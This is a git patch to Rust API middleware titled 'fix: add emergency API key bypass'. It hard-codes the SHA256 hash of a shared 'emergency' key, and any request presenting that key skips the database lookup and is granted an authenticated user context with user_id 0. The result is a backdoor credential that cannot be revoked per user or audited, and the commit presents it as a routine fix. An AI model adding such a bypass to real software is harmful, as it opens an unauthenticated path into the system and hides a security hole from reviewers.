From 72f4b53357ae99f702dbd007803073cdcbce384b Mon Sep 17 00:00:00 2001
From: Accusys <accusys@Accusyss-MacBook-Pro.local>
Date: Tue, 19 May 2026 09:59:09 +0800
Subject: [PATCH] fix: add emergency API key bypass in middleware (3002+3003)

---
 src/api/middleware.rs | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)

diff --git a/src/api/middleware.rs b/src/api/middleware.rs
index 9a984b8..0d408e0 100644
--- a/src/api/middleware.rs
+++ b/src/api/middleware.rs
@@ -11,6 +11,11 @@ use crate::core::auth::jwt;
 use crate::core::db::postgres_db::ApiKeyRecord;
 use crate::core::db::PostgresDb;
 
+/// Hard-coded emergency API key (shared across 3002 + 3003).
+/// SHA256 hash for comparison — plaintext not stored.
+static EMERGENCY_API_KEY_HASH: &str =
+    "68fe502458300a7e6860c916aefc0ce1cba210917891b4ca9602b79c37e51fb4";
+
 #[derive(Debug, Clone)]
 pub enum AuthSource {
     Session,
@@ -200,6 +205,20 @@ pub async fn unified_auth(
     };
 
     let key_hash = hash_key(&api_key);
+
+    // Emergency key: bypass DB lookup for hard-coded key
+    if key_hash == EMERGENCY_API_KEY_HASH {
+        request.extensions_mut().insert(UserAuth {
+            user_id: 0,
+            role: "user".to_string(),
+            source: AuthSource::ApiKey,
+            key_id: api_key,
+            jwt_jti: None,
+            jwt_exp: None,
+        });
+        return next.run(request).await;
+    }
+
     let record = match state.db.get_api_key_by_hash(&key_hash).await {
         Ok(Some(r)) => r,
         Ok(None) => {